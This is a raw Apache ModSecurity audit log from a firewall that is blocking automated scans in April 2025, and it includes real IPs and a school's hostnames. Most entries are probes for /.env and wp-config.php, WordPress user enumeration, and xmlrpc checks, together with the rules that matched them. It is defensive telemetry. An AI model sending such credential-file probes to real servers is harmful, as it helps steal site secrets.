ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0db6d58-Z-- --bcc9e50b-A-- [18/Apr/2025:15:30:33 +0700] aAINqTpR4B6O-aqWibMwPAAAAIU 103.236.140.4 52652 103.236.140.4 8181 --bcc9e50b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.232.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.232.123 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --bcc9e50b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc9e50b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744965033292528 758 (- - -) Stopwatch2: 1744965033292528 758; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc9e50b-Z-- --bbdc0503-A-- [18/Apr/2025:15:59:53 +0700] aAIUiTpR4B6O-aqWibMzCgAAAIk 103.236.140.4 34148 103.236.140.4 8181 --bbdc0503-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.61.81 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.61.81 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --bbdc0503-C-- ógooglecom --bbdc0503-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbdc0503-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744966793493372 4365 (- - -) Stopwatch2: 1744966793493372 4365; combined=2557, p1=598, p2=1875, p3=27, p4=31, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbdc0503-Z-- --6883987e-A-- [18/Apr/2025:16:50:10 +0700] aAIgUlyj-eUTITfvHEWktwAAAA8 103.236.140.4 39490 103.236.140.4 8181 --6883987e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; KYF39 Build/100.0.2039; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 Accept-Charset: utf-8 --6883987e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6883987e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744969810448148 791 (- - -) Stopwatch2: 1744969810448148 791; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6883987e-Z-- --8062b765-A-- [18/Apr/2025:16:50:43 +0700] aAIgcxk6uTiIdxrJEEQmawAAAMs 103.236.140.4 39616 103.236.140.4 8181 --8062b765-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36 OPR/63.0.3368.17 (Edition beta) Accept-Charset: utf-8 --8062b765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8062b765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744969843546496 782 (- - -) Stopwatch2: 1744969843546496 782; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8062b765-Z-- --82f9820c-A-- [18/Apr/2025:17:25:14 +0700] aAIoijpR4B6O-aqWibM97wAAAJc 103.236.140.4 47644 103.236.140.4 8181 --82f9820c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --82f9820c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82f9820c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744971914625441 864 (- - -) Stopwatch2: 1744971914625441 864; combined=370, p1=302, p2=0, p3=0, p4=0, p5=68, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82f9820c-Z-- --2b86b829-A-- [18/Apr/2025:18:37:47 +0700] aAI5izlhhbF_BYhFYTVcSwAAAEc 103.236.140.4 35780 103.236.140.4 8181 --2b86b829-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.242.161 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2b86b829-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b86b829-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744976267354541 705 (- - -) Stopwatch2: 1744976267354541 705; combined=300, p1=271, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b86b829-Z-- --d82b3b3f-A-- [18/Apr/2025:19:13:49 +0700] aAJB_TlhhbF_BYhFYTVmagAAAE0 103.236.140.4 44258 103.236.140.4 8181 --d82b3b3f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.97.180.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d82b3b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d82b3b3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744978429165000 822 (- - -) Stopwatch2: 1744978429165000 822; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d82b3b3f-Z-- --6ac31f1f-A-- [18/Apr/2025:20:15:47 +0700] aAJQg1yj-eUTITfvHEXWYQAAAAw 103.236.140.4 51602 103.236.140.4 8181 --6ac31f1f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.158.128 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ac31f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac31f1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744982147423247 858 (- - -) Stopwatch2: 1744982147423247 858; combined=359, p1=318, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac31f1f-Z-- --3d05fa57-A-- [18/Apr/2025:20:19:05 +0700] aAJRSTpR4B6O-aqWibNt0AAAAIs 103.236.140.4 52372 103.236.140.4 8181 --3d05fa57-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3d05fa57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d05fa57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744982345125843 794 (- - -) Stopwatch2: 1744982345125843 794; combined=285, p1=251, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d05fa57-Z-- --e0b2af22-A-- [18/Apr/2025:20:31:23 +0700] aAJUKzlhhbF_BYhFYTWM0QAAAEM 103.236.140.4 55252 103.236.140.4 8181 --e0b2af22-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 128.199.198.141 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 128.199.198.141 Accept-Encoding: gzip X-Varnish: 128758797 --e0b2af22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0b2af22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744983083946917 865 (- - -) Stopwatch2: 1744983083946917 865; combined=354, p1=315, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b2af22-Z-- --b5f25568-A-- [18/Apr/2025:20:42:28 +0700] aAJWxDlhhbF_BYhFYTWOpQAAAE0 103.236.140.4 57872 103.236.140.4 8181 --b5f25568-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.238 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5f25568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f25568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744983748700215 2772 (- - -) Stopwatch2: 1744983748700215 2772; combined=1368, p1=435, p2=903, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f25568-Z-- --1b35e701-A-- [18/Apr/2025:20:42:31 +0700] aAJWxzlhhbF_BYhFYTWOqQAAAEc 103.236.140.4 57888 103.236.140.4 8181 --1b35e701-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b35e701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b35e701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744983751243084 3181 (- - -) Stopwatch2: 1744983751243084 3181; combined=1417, p1=519, p2=869, p3=0, p4=0, p5=29, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b35e701-Z-- --59f70f69-A-- [18/Apr/2025:23:05:25 +0700] aAJ4RRk6uTiIdxrJEERlSQAAANE 103.236.140.4 34636 103.236.140.4 8181 --59f70f69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.232.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.232.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --59f70f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f70f69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744992325280118 899 (- - -) Stopwatch2: 1744992325280118 899; combined=390, p1=352, p2=0, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f70f69-Z-- --1f776018-A-- [18/Apr/2025:23:35:25 +0700] aAJ_TTpR4B6O-aqWibN8OgAAAJg 103.236.140.4 43694 103.236.140.4 8181 --1f776018-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f776018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f776018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744994125042861 3848 (- - -) Stopwatch2: 1744994125042861 3848; combined=2207, p1=665, p2=1500, p3=0, p4=0, p5=42, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f776018-Z-- --7632cb22-A-- [18/Apr/2025:23:35:27 +0700] aAJ_TzlhhbF_BYhFYTWZSAAAAEc 103.236.140.4 43706 103.236.140.4 8181 --7632cb22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7632cb22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7632cb22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744994127342293 2480 (- - -) Stopwatch2: 1744994127342293 2480; combined=1160, p1=412, p2=715, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7632cb22-Z-- --abecac51-A-- [18/Apr/2025:23:35:29 +0700] aAJ_URk6uTiIdxrJEERnUQAAAM8 103.236.140.4 43718 103.236.140.4 8181 --abecac51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abecac51-C-- demo.sayHello --abecac51-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abecac51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744994129662839 6194 (- - -) Stopwatch2: 1744994129662839 6194; combined=4845, p1=614, p2=3890, p3=23, p4=25, p5=160, sr=69, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abecac51-Z-- --2303065a-A-- [18/Apr/2025:23:35:43 +0700] aAJ_Xxk6uTiIdxrJEERnVgAAAM4 103.236.140.4 43810 103.236.140.4 8181 --2303065a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2303065a-C-- demo.sayHello --2303065a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2303065a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744994143673750 6643 (- - -) Stopwatch2: 1744994143673750 6643; combined=4762, p1=711, p2=3789, p3=36, p4=40, p5=108, sr=193, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2303065a-Z-- --f639f11b-A-- [18/Apr/2025:23:51:10 +0700] aAKC_jpR4B6O-aqWibN9DwAAAJQ 103.236.140.4 47310 103.236.140.4 8181 --f639f11b-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f639f11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f639f11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744995070420605 776 (- - -) Stopwatch2: 1744995070420605 776; combined=310, p1=276, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f639f11b-Z-- --9a50db75-A-- [19/Apr/2025:00:19:57 +0700] aAKJvVyj-eUTITfvHEXjkwAAAA8 103.236.140.4 53896 103.236.140.4 8181 --9a50db75-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9a50db75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a50db75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
